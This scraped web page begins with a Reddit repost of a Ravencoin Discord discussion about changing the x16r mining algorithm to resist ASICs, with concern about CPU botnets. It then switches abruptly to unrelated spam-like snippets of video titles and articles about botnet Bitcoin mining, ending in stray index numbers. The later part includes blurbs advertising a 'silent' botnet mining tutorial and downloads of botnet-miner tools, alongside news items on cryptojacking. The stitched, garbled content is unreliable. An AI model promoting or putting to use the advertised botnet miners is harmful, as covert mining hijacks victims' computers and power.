why isn;t a simple XOR or something on the table?
ZaabLast Friday at 4:52 PM
The multiple bip9 that is
Lokar -=Kai=-Last Friday at 4:52 PM
something asic breaking but doesn't greatly complicate ongoing efforts for FPGA being my point.
justinjjaLast Friday at 4:52 PM
How are you going to vote for x22rc?
Because if by hashrate that wouldn't pass.
traysiLast Friday at 4:52 PM
Personally I like the idea of x22rc but I'd want to investigate the botnet threat if CPUs are allowed back in.
TronLast Friday at 4:52 PM
XOR is on the table, and was listed in my Medium post. But, the social risk of chain split remains, for very little gain.
traysiLast Friday at 4:53 PM
@Lokar -=Kai=- A small change means that whoever has 45% can probably quickly adapt.
LSJI07 - MBITLast Friday at 4:53 PM
Research sounds good. x22rc could be reduce to x22r for simplicity...
TronLast Friday at 4:53 PM
x22r is a viable option. No CNv4.
LSJI07 - MBITLast Friday at 4:53 PM
Don't know how much time we have to play with though...
Lokar -=Kai=-Last Friday at 4:53 PM
if they have FPGAs yes if they have ASIC then not so much, but I guess that gets to the point, what exactly are we trying to remove from the network?
PlayHardLast Friday at 4:54 PM
Guys my name is Arsen and we designed x16r fpga on bcus. Just about to release it to the public. I am buzzdaves partner.
Cryptonight
Will kill us
But agreed
Asic is possible on x16r
And you dont need 256 core
Cores
traysiLast Friday at 4:55 PM
Hi Arsen. Are you saying CN will kill "us" meaning RVN, or meaning FPGA?
JerozLast Friday at 4:55 PM
This is what im afraid of ^ an algo change killing FPGA as I have the feeling there is a big fpga community working on this
PlayHardLast Friday at 4:55 PM
Fpgas ))
whitefire990Last Friday at 4:55 PM
I am also about to release X16R for CVP13 + BCU1525 FPGA's. I'm open to algo changes but I really don't believe in CPU mining because of botnets. Any CNv4 shifts 100% to CPU mining, even if it is only 1 of the 22 functions.
Lokar -=Kai=-Last Friday at 4:55 PM
namely FPGAs that aren;t memory equipped
like fast mem
not ddr
PlayHardLast Friday at 4:55 PM
Hbm non hbm
Cryptonight
whitefire990Last Friday at 4:56 PM
Right now with both Buzzdave/Altered Silicon and myself (Zetheron) about to release X16R for FPGA's, then the 45% miner's share will decrease to 39% or less.
PlayHardLast Friday at 4:56 PM
Will be dead for fpga
LSJI07 - MBITLast Friday at 4:56 PM
sound so x22r is fpga "friendly" ... more so than asic anyway...
PlayHardLast Friday at 4:56 PM
But a change must be planned
X16r is no way possible to avoid asics
TJayLast Friday at 4:56 PM
@LSJI07 - MBIT I would say less friendly...
whitefire990Last Friday at 4:57 PM
As I mentioned in thenest discussion, asic resistance increases with the square of the number of functions, so X21R is more asic resistant than X16R, but both are pretty resistant
PlayHardLast Friday at 4:58 PM
Yeah more algos make it heavier on ASIC
DirkDiggler (Citadel Architect)Last Friday at 4:58 PM
My interpretation of the whitepaper was that we used x16r as it was brand new (thus ASIC resistant), and that was to ensure a fair launch... We've launched... I don't like the idea of constantly forking to avoid the inevitable ASICs.
x16r was a great "experiment" before we had any exchange listings... that ship has sailed though... not sure about all these x22rs lmnop changes
KAwARLast Friday at 5:00 PM
I believe that it is easier to change the direction of a bicycle than an oil tanker. We feel more like a train. We should lay out new tracks and test on them and find benefits that are acceptable to everyone except train robbers. Then open the new train station with no contentious feelings except a silently disgruntled minority group. ???
Hans_SchmidtLast Friday at 5:01 PM
The most productive action the community can do now re ASICs is to voice support for the devs to make a non-BIP9 change at a chosen block height if/when the need is clear. That removes the pressure to act rashly to avoid voting problems.
LSJI07 - MBITLast Friday at 5:01 PM
Thats why im proposing to fork at least once to a more asic resistant algo (but FPGA "friendly/possible"), with the proviso ideally that no more PoW algo forks are require to provide future ASICs some opportunity to innovate with silicon and efficiency.
TJayLast Friday at 5:01 PM
folks should take into account, that high end FPGAs like BCU1525 on x16r can't beat even previous gen GPUs (Pascal) in terms of hash cost. so they aren't a threat to miners community
PlayHardLast Friday at 5:02 PM
A proper change
Requires proper research
eyz (Silence)Last Friday at 5:02 PM
Just so I'm clear here, we are trying to boot ASICS, don't want CPUs because of Botnets, and are GPU and FPGA friendly right?
PlayHardLast Friday at 5:02 PM
It is not a quick one day process
eyz (Silence)Last Friday at 5:02 PM
If there is a bip9 vote there needs to be a clear explanation as I feel most in the community don't understand exactly what we are trying to fix
TronLast Friday at 5:03 PM
@Hans_Schmidt I like that route. It has some game theoretics. It gives time for miners to adapt. It is only used if needed. It reduces the likelihood of ASICs dominating the network, or even being built.
[Dev-Happy] BlondfrogsLast Friday at 5:03 PM
Hey guys. great convo. We are of course looking to do the best thing for the community and miner. We are going to be signing off here though.
justinjjaLast Friday at 5:03 PM
TJay that comes down to power cost.
If your paying 4c/kw gpus all the way.
But if your a home miner in europe an fpga is your only chance
LSJI07 - MBITLast Friday at 5:03 PM
@Hans_Schmidt How do we decide the block limit and when sufficient evidence is available? I would say we have had much compelling information to date...
[Dev-Happy] BlondfrogsLast Friday at 5:03 PM
Thanks for participating. and keep up the good work :smiley:
Have a good weekend.
CAWWWW
TronLast Friday at 5:03 PM
I haven't seen any compelling evidence of ASICs - yet.
Pho3nix Monk3yLast Friday at 5:03 PM
:v:
JerozLast Friday at 5:04 PM
I suggest to continue discussion in #development and #thenest :smiley:
thanks all!
TronLast Friday at 5:04 PM
Cheers everyone!
KAwARLast Friday at 5:04 PM
Agree with Hans.
DirkDiggler (Citadel Architect)Last Friday at 5:04 PM
thanks Tron
Pho3nix Monk3yLast Friday at 5:04 PM
Ending here. continue in Nest if wanted
DirkDiggler (Citadel Architect)Last Friday at 5:04 PM
I am waiting for compelling evidence myself.
submitted by mrderrik to Ravencoin [link] [comments]

Botcoin: Bitcoin-mining on botnets (NDSS '14 talk) Bitcoin mining bot using Termux - mobile - YouTube Bitcoin Mining Complete Guide & Tutorial (EASIEST METHOD ... Binance User Gets Hacked!  CryptoJacking Botnets?  Envion AG by Zug Court  Cudo Miner? Botnet: Silent Bitcoin Mining - Tutorial + downloads! [Pool Support]

Creating a Bitcoin-Mining Botnet at No Cost. Bitcoins are valuable, in large part because mining for bitcoins takes a lot of resources. At Black Hat a pair of researchers demonstrated that it's ... Botnets are being repurposed to distribute crypto mining malware, using victim’s processing power and energy resources to mine for cryptocurrency, according to security experts at Kaspersky Labs.. The findings from cybersecurity company Kaspersky Labs identifies a growing trend towards using botnets in conjunction with crypto mining attacks, which allows hackers the opportunity to commandeer ... Interestingly, Bitcoin is no more the number one coin among cybercriminals. It is slow and requires high transaction fees. Monero has become very popular for its easy mining, and Dash is the best coin for ransomware authors. Here are the top 3 crypto mining botnets: 1) Smominru, the Biggest Mining Botnet to Date . Also referred to as MyKings, Smominru is a gigantic Monero-mining botnet ... Read more about DDoS attacks and their role in mining for Bitcoin using botnets. What is a Distributed Denial of Service Attack? Distributed Denial of Service (DDoS for short) is the type of malicious cyberattack that disrupts websites, apps, and sometimes entire networks. Not every Distributed Denial of Service attack is the same. They focus on different vectors (HTTP, for instance), and ... Cryptocurrency mining botnets are making millions for their creators by secretly infecting ... Cloud mining enables mining of cryptocurrencies, such as bitcoin, without installation of expensive ...

[index] [42211] [16131] [40659] [12134] [7702] [18976] [19795] [20633] [19386] [30668]

Botcoin: Bitcoin-mining on botnets (NDSS '14 talk)

A post explaining how bitcoins work, an idea of how botnets would mine for you and a proof of concept of the idea! The post contains downloads to TweMiner and kMiner V2! TweMiner is a botnet-miner ... Learn how to use and setup a bitcoin miner to earn bitcoins , litecoins , dogeecoins etc. Download miner from https://easyminer.net/Downloads/ Start trading Bitcoin and cryptocurrency here: http://bit.ly/2Vptr2X IMPORTANT!! This method only illustrates how mining works. You will not make any money f... *ATTENTION* Nicehash has updated their program and the UI is very different from this video. I made an updated video so you can all follow along. Here is the... Bitcoin Miner Malware Incredibly Stealthy! - Duration: 3:58. The PC Security Channel 65,634 views. 3:58 . Black Hat 2013 - Million Browser Botnet - Duration: 48:30. HackersOnBoard 79,193 views ...

#